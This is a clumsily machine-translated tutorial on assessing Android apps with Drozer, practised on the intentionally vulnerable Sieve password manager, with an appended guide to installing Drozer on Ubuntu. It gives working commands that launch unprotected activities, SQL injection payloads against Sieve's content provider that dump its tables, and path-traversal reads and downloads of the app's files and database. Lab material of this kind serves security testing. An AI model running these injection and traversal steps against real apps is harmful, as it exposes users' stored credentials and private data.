Test examples for security evaluation of Android applications using Drozer
Looking at Drozer user documentation, tried several Android apps, the test found that the few apps are basically no problem, had to use the drozer provided by the sieve to practice. The steps to perform the installation evaluation are generally the following heading steps.
1 Installing on an Android device using sieve
Sieve is a password manager app that shows some common flaws in Android apps that you can use to practice drozer. https://www.mwrinfosecurity.com/system/assets/380/original/sieve.apk download sieve.apk. Open the emulator, install Sieve: adb intsall sieve apk
Then set up sieve, first use the password and pin that you need to set the Sieve software to open. Add content to the sieve, adding some account password information to manage
There are other features in the seting:
2 Get App Package info
Drozer the function of each module:
The module that gets the app package information is **app.package.* * *:
2.1 Get the package name of all installed apps on Android device
The command is:
Run App.package.info-a Com.mwr.example.sieve
Run App.package.list
This command will list all the apps, if you want to find a specific app to add the- f [app keyword] parameters, such as Find sieve on Android device package name:
Run App.package.list-f Sieve
Note: When you enter a command, you can use the Tab key to automatically fill in the name of the package that you want to remember Com.mwr.example.sieve.
2.2 Get some basic information on sieve
The command is:
Run App.package.info-a Com.mwr.example.sieve
You can see the version information of the sieve, the directory where the data is stored, the user ID, the group ID, whether there is a shared library, and the permissions information.
2.3Itentify the Attack surface (identify attack surface?) )
This test tutorial focuses on the vulnerability of Android's inherent IPC communication mechanism, which causes the app to leak sensitive information to other apps on the same device. To find the commands that can make attack surface components:
Run App.package.attacksurface Com.mwr.example.sieve
The results show the number of potentially available components: "Exported" means that the component can be used by other apps. Services is debuggable that we can bind a debugger to a process with ADB.
2.4 Get further information on attack surface
The command to further obtain ativity-formed attack surface information is:
Run App.activity.info-a Com.mwr.example.sieve
The mainloginactivity is the main interface when the program starts, it must be exported, and the other two activity is theoretically not exported.
2.5 Start activities
Pwlist and fileselectactivity are exported and do not need any permissions, we can start them with drozer, such as feeling pwlist this gold should be larger, so start it, the command is:
Run App.activity.start–component Com.mwr.example.sieve com.mwr.example.sieve.PWList
The effect after startup:
How to use App.activity.start:
Help App.activity.start Usage:run App.activity.start [-h] [–action action] [–category category [Category ...]] [–component Package Component] [–data-uri Data_uri] [–extra TYPE KEY VALUE] [–flags flags [flags ...]] [–mimetype MimeType]
Starts an Activity using the formulated intent.
2.6 Getting information from content provider
Next to section 2.3, the commands for further information on the content provider's attact surface are:
Run App.provider.info-a Com.mwr.example.sieve
You can see the details of the two exported content provider in section 2.3, including names, permissions, access paths, and so on.
2.6.1 find URIs that can access content provider (data leaks)
From the previous section we guessed that Dbcontentprovider would have a database in some format, but we don't know how the data is organized. The content URI must be in the form of "content:///", so we can construct a partial content URIs to access the Dbcontent Provider. There is a path to "/keys" that requires Read_keys and Write_keys permissions to read and write.
Drozer's scanner module provides some ways to guess which content URIs might exist:
Run Scanner.provider.finduris-a Com.mwr.example.sieve
has detected a URI that can access content, we can then use other modules and URIs from Drozer to get and even change information from the content. Such as:
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–vertical
If we get the username, the mailbox account number, and the BASE64 encoded password string.
2.6.2 for SQL injection
The Android operating system recommends using the SQLite database to store user data. The SQLite database uses SQL statements, so SQL injection is possible. using the projection parameter and the Seleciton parameter, you can pass some simple SQL injection statements to the content provider. Such as:
Run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–projection "'"
Run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–selection "'"
The Android device returned a very detailed error message after the above two commands were executed.
Use SQL injection to list all data tables in the database:
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–projection "* from Sqlite_ MASTER WHERE type= ' table '; – "
use SQL injection to list the contents of a data table :
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–projection "* FROM key;–"
2.6.3 getting information from file system-backed Content providers
File system-backed content provider provides a way to access the underlying file system, and the Android sandbox prevents the app from sharing files, while file system-backed content Provider allows apps to share files. For sieve, we can infer that Filebackupprovider is a file system-backed content provider. We can use Drozer's app.provider.read module to view a file :
Run App.provider.read content://com.mwr.example.sieve.filebackupprovider/etc/hosts
You can download files using App.provider.download
Run App.provider.download content://com.mwr.example.sieve.filebackupprovider/data/data/com.mwr.example.sieve/ Databases/database.db/home/user/database.db
2.6.4 checking the vulnerability of content provider
Check if there is SQL injection:
Run Scanner.provider.injection-a Com.mwr.example.sieve
Check for the existence of a vulnerability traversing a file
Run Scanner.provider.traversal-a Com.mwr.example.sieve
Summary Experience : I think in the beginning to get the basic information of the package, we first use the module scanner inside the tools to sweep, find some loopholes or use points after the next step.
2.7 Interacting with services
Gets the command for a services that is a exported state:
Run App.service.info-a Com.mwr.example.sieve
About the Services Module:
If you send a message to a service:
Run App.service.send com.mwr.example.sieve com.mwr.example.sieve.cryptoservice–msg 1 5 3
Results returned:
Don't understand why this is returned, the number of segments is not enough.
2.8 Other common modules
- Shell.start open an interactive Linux Shell on an Android device
- Tools.file.upload/tools.file.download
- TOOLS.SETUP.BUSYBOX/TOOLS.SETUP.MINIMALSU installing BusyBox or MINIMALSU on Android devices
Ubuntu14.04 installation and use of Drozer tools July 22, 2014/No CommentsIntroduction to the installation and use of Ubuntu14.04 Drozer tools 1.Drozer Tools
Slightly
2. Installation of tools 2.1 installation Prerequisites
Make sure that the PC's operating system is installed with:
The 64-bit Ubuntu14.04 needs to be installed ia32-libs. Make sure that ADB and Java are already in the system environment variable path.
2.2Ubuntu Mounting Drozer
Can be downloaded from the official website https://www.mwrinfosecurity.com/products/drozer/community-edition/. Deb installation package directly installed; You can also download the. Egg Python package installation, which requires you to manually download and install the PROTOBUF and twisted packages yourself. I am a direct download of the. deb package installed.
2.3 Mobile phone or simulator Installation Agent agent.apk
To download agent.apk, use the command to install:
ADB install agent.apk
3 Drozer Use 3.1 establish Drozer console and Dorzer Agent connection, open a session
STEP1 Establish port forwarding, Drozer uses port 31415 by default. The following command: Forwards all data from Ubuntu TCP port 31415 to the 31415 port on the phone:
ADB forward tcp:31415 tcp:31415
STEP2 Open the agent server on your Android device. Select the "enbeded Server" option, and then select "Enadble" to turn on agent server.
Step3 Use Drozer console to connect to the agent server. Enter the command in the Ubuntu Terminal:
Drozer Console Connect
Open the effect as follows:
Command for 3.2Drozer console
The Drozer console is a command-line environment similar to the bash shell. The Drozer console provides a range of modules for evaluating the security of Android devices, each with a clear function. It is the command description that you translate according to the official document, which may not be accurate:
Command |
Description |
Notes |
Run MODULE |
Run a Drozer module |
|
List or LS |
Displays all Drozer modules that can be executed in the current session |
Hide modules that you do not have permission to execute |
Shell |
Open an interactive Linux shell in the context of the agent process on the device |
|
Cd |
Jump command, mount to the specified module space |
You can avoid repeating the full name of the input module |
Clean |
Clear the temporary files Drozer saved on your Android device |
|
Contributors |
List names that contribute to the Drozer framework |
|
Echo |
displaying text in the console |
|
Exit |
End Drozer Session |
|
About |
Help for displaying a command or module (about) |
|
Load |
Loads and sequentially runs a file containing a series of DROZER commands |
|
Module |
Find and install Drozer extension modules from the Internet |
|
Permissions |
Displays the permissions that the Drozer agent obtains |
|
Set |
An assignment operation that saves a value to a variable that can be used as an environment variable |
such as: Set host=193.168.1.1 |
unset |
Cancel Assignment |
...... |
Use the list to display all the modules first, then use the CD command to enter the scanner module, then using the set, echo, unset command
is the Official Document command description:
Use Drozer to evaluate the app (reprint)